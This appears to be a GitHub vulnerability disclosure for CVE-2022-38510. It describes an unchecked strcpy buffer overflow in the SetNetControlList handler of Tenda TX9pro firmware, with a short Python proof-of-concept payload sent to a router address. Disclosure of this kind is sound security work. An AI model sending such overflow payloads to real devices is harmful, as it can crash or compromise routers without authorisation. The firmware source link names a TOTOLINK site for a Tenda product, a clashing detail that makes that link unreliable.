Headline
CVE-2022-38510: CVE/SetNetControlList.md at main · whiter6666/CVE
Tenda_TX9pro V22.03.02.10 was discovered to contain a buffer overflow via the component httpd/SetNetControlList.
Permalink
Cannot retrieve contributors at this time
buffer overflow****Tenda_TX9pro
version: V22.03.02.10
Description:
There is a buffer overflow in httpd/SetNetControlList
Source:
you may download it from : http://www.totolink.cn/home/menu/detail.html?menu_listtpl=download&id=2&ids=36
Analyse:
get value from list and send it to sub_43157C
don’t check the length of a1 and call strcpy
POC
url = "http://192.168.1.13/goform/SetNetControlList"
payload = 'A'*300 + '\n'
r = requests.post(url, data={'list': payload})